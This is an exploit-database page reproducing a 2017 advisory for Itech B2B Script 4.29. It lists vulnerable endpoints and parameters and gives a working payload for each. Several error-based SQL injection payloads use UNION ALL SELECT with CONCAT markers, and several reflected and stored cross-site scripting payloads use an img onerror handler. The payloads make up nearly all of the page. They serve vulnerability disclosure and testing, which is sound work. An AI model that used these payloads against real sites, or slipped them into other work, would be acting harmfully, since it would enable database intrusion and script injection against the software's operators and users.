Itech B2B 4.2.9 Cross Site Scripting / SQL Injection
CVE
Category
Price
Severity
CWE-79
$1000
High
Author
Risk
Exploitation Type
Date
Not specified
High
Remote
2017-02-15
CPE
cpe:No CPE (Common Platform Enumeration) URI string associated with this exploit
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017020152 Below is a copy:
Itech B2B 4.2.9 Cross Site Scripting / SQL Injection Exploit Title : Itech scripts B2B Script v4.29 - Multiple Vulnerability
Google Dork : -
Date : 12/02/2017
Exploit Author : Marc Castejon <[email protected] >
Vendor Homepage : http://itechscripts.com/b2b-script/
Software Link: http://b2b.itechscripts.com
Type : webapps
Platform: PHP
Version: 4.29
Sofware Price and Demo : $250
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: keywords
Method: GET
Payload: ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: rctyp
Method: GET
Payload: ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
-----------------------------------------------
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: rctyp
Method: GET
Payload: <img src=i onerror=prompt(1)>
-----------------------------------------------
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: keyword
Method: GET
Payload: <img src=i onerror=prompt(1)>
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/catcompany.php
Vulnerable Parameters: token
Method: GET
Payload: ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
-----------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/buyleads-details.php
Vulnerable Parameters: id
Method: GET
Payload: ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
-----------------------------------------------
Type: Stored XSS
Vulnerable URL:http://localhost/[PATH]/ajax-file/sendMessage.php
Vulnerable Parameters: msg_message
Method: POST
Payload: <img src=i onerror=prompt(1)>
------------------------------------------------
Type: Stored XSS
Vulnerable URL:http://localhost/[PATH]/my-contactdetails.php
Vulnerable Parameters: fname
Method: POST
Payload: <img src=i onerror=prompt(1)>
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum